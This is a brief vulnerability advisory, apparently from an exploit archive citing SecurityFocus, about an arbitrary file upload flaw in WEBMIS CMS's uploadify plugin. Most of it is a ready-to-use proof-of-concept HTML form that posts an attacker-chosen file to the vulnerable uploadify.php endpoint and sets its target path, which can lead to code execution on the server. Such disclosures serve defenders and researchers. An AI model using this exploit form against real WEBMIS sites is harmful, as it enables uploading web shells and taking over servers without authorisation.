source: https://www.securityfocus.com/bid/68658/info WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <form action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type=text name="path" value="/webmis_installation/plugin/"> <input type=text name="someKey" value="someValue"]> <input type="submit" name="submit" value="Submit"> </form>